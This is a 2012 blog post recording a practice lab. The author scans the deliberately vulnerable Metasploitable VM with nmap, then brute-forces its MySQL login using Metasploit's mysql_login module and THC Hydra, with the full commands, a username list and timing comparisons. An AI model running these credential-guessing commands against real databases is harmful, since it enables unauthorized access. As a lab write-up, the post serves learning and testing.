Sunday 15 January 2012

Brute Forcing MySQL

I just did my first nmap scan against the Metasploitable Virtual Machine. There are several open ports and a lot of services running on the VM. Here is a listing of the services found by nmap:



PORT STATE SERVICE VERSION

21/tcp open ftp ProFTPD 1.3.1

22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)

139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open ajp13?
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1



First I wanted to execute some brute-force attacks against the MySQL database that is running in Metasploitable. There are different ways of brute-forcing it, but your scanner is just as good as you're wordlist or wordcombination files for usernames and passwords are (here are username and password lists for a first shot).

As password list, I'm using elitehacker.txt.bz2 provided by skullsecurity.org and I defined six different users:


root@bt:~/test_environment/brute_force# cat username.txt 
admin
root
mysql
db
test
user


I inserted also all of these six users and a blank line into the elitehackers.txt password file.


1. Using Metasploit

#msfconsole
#search mysql
#use auxiliary/scanner/mysql/mysql_login
#show options
#set RHOSTS <Target IP>
#set USER_FILE /root/<your_username_file>
#set PASS_FILE /root/<your_password_file>
#exploit


The verbose mode is set by default to true, so you can see all login attempts. This is not very convenient, because of two reasons:

a) If the brute force attempt is successful you have to scroll back the whole list of attempts to find the login as there is no summary after finishing the mysql_login module (can be very nasty).
b) The actual scan time is decreasing dramatically. When I was scanning with verbose set to true, it took me 5 Minutes and 5 Seconds. After deactivating verbose mode, the scan was done in 2 Minutes and 5 Seconds.

Conclusion => #set VERBOSE false



2. Using THC Hydra

#hydra -L /root/<your_username_file> -P /root/<your_password_file> <IP> mysql



3. Result

So here is an overview of the results (all scans were executed with the same user- and passwordfile).

mysql_login (verbose mode activated)5 Minutes 5 Seconds
mysql_login (verbose mode deactivated)2 Minutes 5 Seconds
THC Hydra4 Minutes 8 Seconds

It was just a very small brute-forcing attack (5.412 username/password combinations), but Metasploit took almost 25% more time than Hydra with the same wordlists when verbose mode is activated in mysql_login.

If verbose mode is deactivated it is by far the most effective way to brute force mysql.

I don't know if this will scale in the same manner if the brute force attack will have more combinations, but the mysql_login module of Metasploit seems more efficient for mysql brute forcing than THC Hydra.

So let's check this finding manually:


So now we have another login, for a new attack :-)

No comments:

Post a Comment